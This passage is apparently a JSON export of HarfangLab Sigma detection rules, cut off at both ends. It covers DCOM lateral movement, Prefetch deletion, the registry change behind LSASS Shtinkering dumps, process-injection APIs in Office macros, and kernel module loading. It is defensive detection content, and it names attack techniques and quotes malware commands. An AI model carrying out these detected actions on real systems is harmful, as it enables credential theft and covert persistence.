"rule_confidence_override": null,
"references": [
"https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor",
"https://github.com/deepinstinct/DCOMUploadExec",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_dcom_imsiserver_upload_execute.yml",
"content": "title: DCOM Upload and Execute via IMsiServer\nid: afc0aad4-2a07-40e8-bf67-4e0056e60353\ndescription: |\n Detects a suspicious inbound connection to an MSI Custom Action Server.\n This is unusual behavior which could indicate lateral movement using the IMsiServer DCOM interface.\n It is recommended to investigate the \"MsiExec.exe\" process for suspicious activities and pivot on the source IP if possible.\nreferences:\n - https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor\n - https://github.com/deepinstinct/DCOMUploadExec\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2024/12/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.HackTool.DCOMUploadExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessCommandLine|startswith:\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding' # Custom Action Server\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V' # MsiServer\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n Initiated: 'false'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afc0aad4-2a07-40e8-bf67-4e0056e60353",
"rule_name": "DCOM Upload and Execute via IMsiServer",
"rule_description": "Detects a suspicious inbound connection to an MSI Custom Action Server.\nThis is unusual behavior which could indicate lateral movement using the IMsiServer DCOM interface.\nIt is recommended to investigate the \"MsiExec.exe\" process for suspicious activities and pivot on the source IP if possible.\n",
"rule_creation_date": "2024-12-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afc3222f-d83e-4ccf-9d72-3f2d046df5c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.450440Z",
"creation_date": "2026-03-23T11:45:34.620206Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620210Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_prefetch_deleted.yml",
"content": "title: Prefetch File Deleted\nid: afc3222f-d83e-4ccf-9d72-3f2d046df5c7\ndescription: |\n Detects the deletion of a Prefetch file.\n Prefetch files are useful forensics artifacts allowing the investigation of applications that have recently run on a Windows system.\n Adversaries may delete these files to cover their tracks and disrupt incident response or forensic analysis.\n It is recommended to investigate the deletion activity, check for missing Prefetch files in the \"%ProgramFiles%\\WindowsResources\\Prefetch\" directory and review the user or process responsible.\n It is common for administrators to execute cleanup scripts from RMM solutions that delete Prefetch files.\n If this is recurrent in your environment, it is highly recommended to whitelist this alert.\nreferences:\n - https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/09/15\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: file_remove\ndetection:\n selection:\n Path: '?:\\Windows\\Prefetch\\\\*.pf'\n ProcessParentImage|startswith: '?:\\'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -s SysMain'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain'\n - '?:\\windows\\system32\\svchost.exe -k sysmain'\n - '?:\\windows\\system32\\svchost.exe -k sysmain -p'\n - '?:\\windows\\system32\\svchost.exe -k sysmain -p -s SysMain'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_explorer:\n - ProcessImage: 
'?:\\Windows\\explorer.exe'\n ProcessParentImage: '?:\\Windows\\System32\\userinit.exe'\n - ProcessCommandLine: '?:\\WINDOWS\\explorer.exe /factory,{????????-????-????-????-????????????} -Embedding'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\Downloaded Program Files\\' # ActiveX\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_sysprep:\n ProcessOriginalFileName: 'sysprep.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wisecleaner:\n ProcessOriginalFileName: 'WiseDiskCleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lespeed Technology Co., Ltd'\n\n exclusion_sysinfocap:\n ProcessOriginalFileName: 'SysInfoCap.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n exclusion_revounin:\n ProcessOriginalFileName: 'RevoUnin.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'VS Revo Group Ltd.'\n - 'VS REVO GROUP OOD'\n\n exclusion_ccleaner:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'PIRIFORM SOFTWARE LIMITED'\n - 'Gen Digital Inc.'\n\n exclusion_ccleaner_nosign:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessCompany: 'Piriform Software Ltd'\n ProcessProduct: 'CCleaner'\n\n exclusion_manager_service:\n ProcessOriginalFileName: 'MSPCManagerService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_avira:\n ProcessOriginalFileName: 'Service.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Avira Operations GmbH'\n\n exclusion_bleachbit:\n ProcessOriginalFileName: 'bleachbit.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Andrew Ziem'\n - 'Open Source Developer, Andrew Ziem'\n\n exclusion_dism1:\n ProcessOriginalFileName: 'Dism++.exe'\n ProcessCompany: 'Chuyu Team'\n ProcessProduct: 
'Dism++'\n exclusion_dism2:\n ProcessImage|endswith: '\\Dism++x64.exe'\n ProcessOriginalFileName: ''\n ProcessCompany: ''\n\n exclusion_emjysoft:\n ProcessDescription: 'Emjysoft Cleaner'\n ProcessSigned: 'true'\n ProcessSignature: 'Emjysoft'\n\n exclusion_novell:\n - ProcessAncestors|contains: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\handlers\\runscriptenf.exe'\n - ProcessCurrentDirectory: '?:\\Program Files (x86)\\Novell\\ZENworks\\'\n ProcessCommandLine|contains: '\\zen_executeRunscript_'\n\n exclusion_cleanmgr:\n ProcessOriginalFileName: 'Cleanmgr+.exe'\n ProcessCompany: 'Builtbybel'\n ProcessProduct: 'Cleanmgr+'\n\n exclusion_syscleanpro:\n ProcessOriginalFileName: 'SysCleanPro.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Beijing Qihu Technology Co., Ltd.'\n\n exclusion_pdgdeployrunner:\n ProcessParentImage: '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-1\\PDQDeployRunner-1.exe'\n\n exclusion_screenshotx:\n ProcessParentImage: '?:\\Program Files (x86)\\ScreenshotX\\Uninstall.exe'\n\n exclusion_bcuninstaller:\n ProcessOriginalFileName: 'BCUninstaller.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Marcin Szeniak'\n\n exclusion_mspcmanagercore:\n ProcessOriginalFileName: 'MSPCManagerCore.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n # https://strontic.github.io/xcyclopedia/library/clsid_3ad05575-8857-4850-9277-11b85bdb8e09.html\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_iobit:\n ProcessOriginalFileName: 'IObitUninstaller.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'IObit CO., LTD'\n - 'IObit Co., Ltd.'\n\n exclusion_wisecare:\n ProcessOriginalFileName: 'Wise Care 365'\n ProcessSigned: 'true'\n ProcessSignature: 'Lespeed Technology Co., Ltd'\n\n exclusion_revounpro:\n ProcessOriginalFileName: 'RevoUnPro.exe'\n 
ProcessSigned: 'true'\n ProcessSignature: 'VS REVO GROUP OOD'\n\n exclusion_centrastage:\n ProcessParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_ccm:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\CcmExec.exe|'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n exclusion_hibituninstaller:\n ProcessOriginalFileName: 'HiBitUninstaller'\n ProcessDescription: 'HiBit Uninstaller'\n ProcessCompany: 'HiBitSoftware'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_wapt:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\python.exe'\n\n exclusion_gdata:\n ProcessOriginalFileName: 'AVClean.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'G DATA CyberDefense AG'\n\n exclusion_superopsrmm:\n ProcessParentImage: '?:\\Program Files\\superopsrmm\\bin\\superops.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - \"Custom cleanup scripts from RMM solutions that delete Prefetch files to save space.\"\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afc3222f-d83e-4ccf-9d72-3f2d046df5c7",
"rule_name": "Prefetch File Deleted",
"rule_description": "Detects the deletion of a Prefetch file.\nPrefetch files are useful forensic artifacts that allow the investigation of applications that have recently run on a Windows system.\nAdversaries may delete these files to cover their tracks and disrupt incident response or forensic analysis.\nIt is recommended to investigate the deletion activity, check for missing Prefetch files in the \"%ProgramFiles%\\WindowsResources\\Prefetch\" directory and review the user or process responsible.\nIt is common for administrators to execute cleanup scripts from RMM solutions that delete Prefetch files.\nIf this is recurrent in your environment, it is highly recommended to whitelist this alert.\n",
"rule_creation_date": "2023-09-15",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0120c9c-02c9-4ea2-bb67-0f50ff53427f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621043Z",
"creation_date": "2026-03-23T11:45:34.621045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Lsass-Shtinkering",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_registry_modification_lsass_shtinkering_specific.yml",
"content": "title: Suspicious Registry Modification Associated with LSASS Shtinkering\nid: b0120c9c-02c9-4ea2-bb67-0f50ff53427f\ndescription: |\n Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\n LSASS Shtinkering is a LSASS dump technique that consists in sending a message to the Windows Error Reporting service to report an LSASS exception.\n This, along with the correct dump type set in the registry, will dump the LSASS process memory.\n This registry option might be enabled to aid Windows application developers with debugging.\n It is recommended to investigate the process performing the registry modification to determine its legitimacy, a legitimate context could be the debugging of an application.\nreferences:\n - https://github.com/deepinstinct/Lsass-Shtinkering\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/04/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType\\lsass.exe'\n Details: 'DWORD (0x00000002)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 
'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_amazon:\n ProcessCommandLine: 'powershell.exe -ExecutionPolicy RemoteSigned -file ?:\\Program Files\\Amazon\\Photon\\Bootstrap\\bootstrap.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0120c9c-02c9-4ea2-bb67-0f50ff53427f",
"rule_name": "Suspicious Registry Modification Associated with LSASS Shtinkering",
"rule_description": "Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\nLSASS Shtinkering is an LSASS dump technique that consists of sending a message to the Windows Error Reporting service to report an LSASS exception.\nThis, along with the correct dump type set in the registry, will dump the LSASS process memory.\nThis registry option might be enabled to aid Windows application developers with debugging.\nIt is recommended to investigate the process performing the registry modification to determine its legitimacy; a legitimate context could be the debugging of an application.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b017a945-6dc9-439d-a646-cd49dd78ae40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623863Z",
"creation_date": "2026-03-23T11:45:34.623865Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623883Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/005/",
"https://attack.mitre.org/techniques/T1106"
],
"name": "t1059_005_office_vba_macro_susp_native_api.yml",
"content": "title: Office VBA Macro Suspicious Native API Usage\nid: b017a945-6dc9-439d-a646-cd49dd78ae40\ndescription: |\n Detects suspicious native API usage in an Office VBA Macro.\n Threat actors can embed a macro that silently calls Windows's low level routines to carve out executable space inside a process, drop malicious code there, and then hand control to that code by spawning or hijacking a thread.\n By launching a secondary process and manipulating its execution context, they can inject the payload without touching the disk, gaining stealthy execution.\n It is recommended to investigate the TextPayload and the related Office document for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1059/005/\n - https://attack.mitre.org/techniques/T1106\ndate: 2026/01/13\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.005\n - attack.t1106\n - classification.Windows.Source.AmsiScan\n - classification.Windows.Behavior.Phishing\nlogsource:\n product: windows\n category: amsi_scan\ndetection:\n selection:\n AppName: 'OFFICE_VBA'\n ProcessProcessName:\n - 'Excel.exe'\n - 'WinWord.exe'\n TextPayload|contains:\n # Native API usage\n - 'GetProcAddress'\n - 'VirtualAlloc'\n - 'NtAllocateVirtualMemory'\n - 'CreateProcess?('\n - 'CreateProcess('\n - 'SetThreadContext'\n - 'NtSetContextThread'\n - 'CreateRemoteThread'\n - 'LoadLibrary'\n - 'NtProtectVirtualMemory'\n - 'VirtualProtect'\n - 'QueueUserApc'\n - 'WriteProcessMemory'\n - 'NtWriteVirtualMemory'\n\n exclusion_opensolver:\n ContentName|endswith: '\\OpenSolver.xlam'\n\n exclusion_xlwings:\n TextPayload|contains: 'KERNEL32.LoadLibraryA(*\\xlwings64*.dll)'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b017a945-6dc9-439d-a646-cd49dd78ae40",
"rule_name": "Office VBA Macro Suspicious Native API Usage",
"rule_description": "Detects suspicious native API usage in an Office VBA Macro.\nThreat actors can embed a macro that silently calls Windows' low-level routines to carve out executable space inside a process, drop malicious code there, and then hand control to that code by spawning or hijacking a thread.\nBy launching a secondary process and manipulating its execution context, they can inject the payload without touching the disk, gaining stealthy execution.\nIt is recommended to investigate the TextPayload and the related Office document for suspicious activities.\n",
"rule_creation_date": "2026-01-13",
"rule_modified_date": "2026-03-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0391959-bd75-4da0-9f2c-a888f2fb3349",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.615481Z",
"creation_date": "2026-03-23T11:45:35.294594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294600Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/8/modprobe",
"https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://attack.mitre.org/techniques/T1547/006/",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1547_006_kernel_module_load_modprobe.yml",
"content": "title: Kernel Module Loaded via Modprobe\nid: b0391959-bd75-4da0-9f2c-a888f2fb3349\ndescription: |\n Detects the execution of modprobe to load a kernel module manually.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n It is recommended to analyze both the process calling modprobe and the loaded kernel module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/modprobe\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # modprobe my_malicious_malware\n # modprobe -a malicious_1 malicious_2\n # modprobe -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'modprobe '\n\n # Ensure `modprobe` isn't called from a kworker thread (they have an empty image path)\n ParentImage|contains: '?'\n\n # modprobe --help\n exclusion_options_args:\n CommandLine|contains:\n - ' --help'\n - ' --version'\n - ' --dry-run'\n - ' --show'\n - ' --show-depends'\n - ' --showconfig'\n - ' --show-config'\n - ' --show-modversions'\n - ' 
--show-exports'\n - ' -n '\n\n exclusion_modules:\n CommandLine|contains:\n - ' nvidia'\n - ' nf_conntrack'\n - ' tun'\n - ' fuse'\n - ' evdi'\n - ' zfs'\n - ' aufs'\n - ' btrfs'\n - ' kvm_intel'\n - ' efivars'\n - ' vboxdrv'\n - ' overlay'\n - ' cpufreq_performance'\n - ' cpufreq_powersave'\n - ' cpufreq_conservative'\n - ' ipt_connmark'\n - ' net-pf-10'\n\n exclusion_iptables:\n ParentImage:\n - '/usr/bin/iptables'\n - '/usr/sbin/iptables'\n - '/usr/bin/xtables-multi'\n - '/usr/sbin/xtables-multi'\n - '/usr/bin/xtables-legacy-multi' # iptables using old getsockopt/setsockopt-based kernel api\n - '/usr/sbin/xtables-legacy-multi'\n - '/usr/sbin/ebtables'\n - '/usr/sbin/ebtables-legacy'\n - '/usr/sbin/ebtables-legacy-restore'\n\n exclusion_containers:\n ProcessAncestors|contains: '/usr/bin/containerd-shim'\n\n exclusion_systemd:\n ParentImage:\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_microk8s:\n - ParentImage: '/snap/microk8s/*/sbin/xtables-legacy-multi'\n - ParentCommandLine: '/bin/bash /snap/microk8s/*/run-kubelite-with-args'\n\n exclusion_containerd:\n ParentImage: '/usr/bin/containerd'\n\n exclusion_dockerd:\n - ParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/docker-containerd-shim-current|'\n - '|/var/lib/rancher/*/bin/containerd-shim-runc-v2|'\n\n exclusion_os_prober:\n GrandparentCommandLine:\n - '/bin/sh /usr/bin/os-prober'\n - '/usr/bin/sh /bin/os-prober'\n\n exclusion_openvpn:\n - ParentImage: '/usr/lib/nm-openvpn-service'\n - GrandparentImage: '/usr/lib/NetworkManager/nm-openvpn-service'\n\n exclusion_veritas:\n GrandparentImage: '/opt/VRTSralus/bin/beremote'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - 
'/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_ipv6:\n CommandLine: 'modprobe ipv6'\n GrandparentCommandLine:\n - '/bin/bash /etc/rc.d/init.d/network start'\n - '/bin/bash /etc/sysconfig/network-scripts/ifup-eth ifcfg-*'\n\n exclusion_suspend:\n ParentCommandLine:\n - '/bin/bash /usr/lib/systemd/system-sleep/wifi-reset post suspend'\n - '/bin/bash /usr/lib/systemd/system-sleep/touchpad-reset post suspend'\n GrandparentCommandLine: '/lib/systemd/systemd-sleep suspend'\n\n exclusion_pacman:\n ProcessAncestors|contains: '|/usr/bin/pacman|'\n\n exclusion_dpkg:\n ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_legitimate_parent:\n - ParentImage:\n # PLZ sandbox\n - '/tmp/plz_sandbox/'\n # Nagios\n - '/usr/sbin/nagios'\n # Podman\n - '/usr/bin/podman'\n # System utilities\n - '/usr/sbin/networkmanager'\n # Kube\n - '/usr/local/bin/kube-proxy'\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/usr/bin/rke2'\n - '/usr/local/bin/rke2'\n - '/opt/rancher/rke2/bin/rke2'\n - '/usr/bin/cilium-agent'\n - '/usr/bin/brltty'\n - '/usr/sbin/pktsetup'\n - '/usr/sbin/alsactl'\n - '/usr/lib/snapd/snapd'\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/microk8s/*/kubelite'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - ParentCommandLine:\n # Intel\n - '/bin/sh /etc/kernel/preinst.d/intel-microcode *'\n - '/bin/sh /usr/share/initramfs-tools/hooks/intel_microcode'\n # VirtualBox\n - '/bin/sh /usr/lib/virtualbox/vboxdrv.sh *'\n - '/usr/bin/sh /usr/lib/virtualbox/vboxdrv.sh *'\n - '/bin/sh /etc/init.d/virtualbox *'\n - '/bin/sh /etc/init.d/virtualbox-guest-utils-hwe *'\n # Nagios\n - '/usr/local/nagios/plugins/check_ping'\n # Laptop detect\n - '/bin/sh -e 